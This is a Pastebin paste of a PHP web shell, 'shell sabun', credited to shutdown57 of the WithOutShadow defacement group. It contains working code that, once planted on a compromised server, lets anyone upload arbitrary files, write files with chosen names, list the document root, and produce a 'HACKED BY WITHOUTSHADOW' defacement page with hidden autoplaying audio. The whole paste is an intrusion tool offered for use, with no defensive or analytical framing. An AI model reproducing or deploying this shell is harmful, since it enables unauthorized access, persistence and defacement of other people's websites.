Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /****
- Hai kiddies....
- Kau taulah apa yang gak pantas kau lakukan.
- --------------
- Author : shutdown57
- Script : shell sabun
- copyrigt opensource 2016
- --------------
- ***/
- @error_reporting(0);
- @set_time_limit(0);
- $dir = $_SERVER['REQUEST_URI'];
- $path = $_SERVER['DOCUMENT_ROOT'];
- $date = date('d/m/Y');
- echo'<html>
- <head>
- <title>! WOS ~ Sabun shell !</title>
- <link rel="icon" href="http://pesantrencilikindonesia.com/images/logo.png">
- </head>
- <body>
- <h1> WithOutShadow Shell Versi Sabun Mandi </h1>
- <center>
- <table><tr><td>
- <form method="post">
- <font color="red"> Tanggal Nyabun :</td><td><input type="text" value=" '.$date.'" width="40%"> </td></tr>
- </font><br/><tr><td>
- <font color="red"> Nama Sabun :</td><td><input type="text" value=" '.$dir.'" width="40%"> </td></tr>
- </font><br/><tr><td>
- <font color="red"> Root Sabun :</td><td><input type="text" value=" '.$path.'" width="40%"> </td></tr>
- </form>
- </table>
- </font><br/>
- </form>
- <form method="post">
- <br/>
- <input type="submit" value="Tambah sabun" name="up" id="buton">
- <input type="submit" value="buat sabun" name="mk" id="buton">
- <input type="submit" value="cek merk sabun" name="dir" id="buton">
- <input type="submit" value="ambil sabun" name="ambil" id="buton">
- </form>';
- if($_POST['mk']){
- echo'
- <form method="post">
- <textarea name="sabun" >
- <html>
- <head>
- <title> HACKED BY WithOutShadow </title>
- </head>
- <body>
- <h1> HACKED ! </h1>
- </body>
- </html>
- </textarea>
- <br/>
- <font color="lime">Nama Sabun :</font><input type="text" value="shinzui.html" name="nama">
- <input type="submit" value="buat!" name="buat"id="buton">
- </form>';
- }
- if($_POST['buat']){
- $nama = $_POST['nama'];
- $mk= fopen("$nama","a+");
- $buat = $_POST['sabun'];
- echo fwrite($mk,"$buat");
- fclose($mk);
- }
- if($_POST['up']){
- echo'<form action="" method="post" enctype="multipart/form-data">
- <input type="file" name="wos" id="up"/>
- <button type="submit" name="btn-upload" id="buton">Tambah!</button>
- </form>';}
- if(isset($_POST['btn-upload']))
- {
- $pic = $_FILES['wos']['name'];
- $pic_loc = $_FILES['wos']['tmp_name'];
- $folder="";
- if(move_uploaded_file($pic_loc,$folder.$pic))
- {
- ?><script>alert('Berhasil Menyabun');</script><?php
- }
- else
- {
- ?><script>alert('Gagal Menyabun-,-/');</script><?php
- }
- }
- if($_POST['dir']){
- echo'<font color="red">';
- print_r(scandir("$path"));}
- if($_POST['ambil']){
- echo'<textarea>
- <html>
- <head>
- <title> ~# HACKED ~#</title>
- <link rel="icon" href="https://cdn4.iconfinder.com/data/icons/emoticons-outline/512/27-512.png">
- </head>
- <body>
- <script> alert(\'has been pentested !\n is not secure !\') </script>
- <style>
- body{
- background:url(\'http://img11.deviantart.net/d3c0/i/2010/324/3/0/cry__naruto__cry_by_arwiken-d3391lp.png\')no-repeat center fixed black;
- color:#81ff00;
- cursor: url(http://cur.cursors-4u.net/symbols/sym-4/sym379.cur),crosshair !important;}
- width:100%;
- height:100%;
- }
- #foot{
- color:#81ff00;
- font-size:15px;
- width:100%;
- bottom:0;
- position:absolute;
- line-height:50px;
- font-family:iceberg;}
- .shutdown57{
- background:#333;
- opacity:0.6;
- border:1px #333 dotted;
- border-radius:30px;
- width:90%;
- height:100%;
- box-shadow:0px 0px 10px #fff,0px 0px 20px #fff,0px 0px 30px #333;}
- </style>
- <iframe width="1" height="1" src="https://www.youtube.com/embed/mF3DCa4TbD0?rel=0&autoplay=1&loop=1" frameborder="0" allowfullscreen></iframe>
- <center>
- <div class="shutdown57">
- <pre><i><font color=red>
- HACKED BY WITHOUTSHADOW
- </font>
- </pre>
- <center>
- <img src="https://cdn4.iconfinder.com/data/icons/emoticons-outline/512/27-512.png" style="opacity:0.6;width:250;height:250;">
- <br><br><br>
- <table id="foot"><tr><td>
- <p> THANKS: </td><td><marquee>~#~ [-]shadow_99[!] ~#~ MRG#7 ~#~ root@88; ~#~ hacked4LL ~#~ sunr15 ~#~ xXx-ID ~#~ [!]s03x67 ~#~ x-root ~#~ Mr.Low ~#~ ERROR#404 ~#~ page not found ~#~ Mr.@ ~#~ Mr.X ~#~ Phan7om ~#~ jihad797 ~#~ Mujahidin57 ~#~ CyberSec ~#~ </marquee></p> </td></tr></table>
- </div>
- </center>
- </body>
- </html>
- </textarea>';
- }
- echo'
- <style>
- body{
- background:#000;
- color:#000;
- }
- input{
- valign:center;
- color:#eee;
- background:#000;
- border:1px dashed lime;
- }
- h1{
- text-align:center;
- font-size:30px;
- text-shadow:0px 0px 10px #eee;
- }
- #buton{
- color:#81ff00;
- background:#005d33;
- border:1px solid #000;
- border-radius:3px;
- }
- textarea{
- width:60%;
- height:260px;
- color:#ff0000;
- background:#000;
- border:1px dashed #ff0000;
- }
- </style>';
- ?>
Add Comment
Please, Sign In to add comment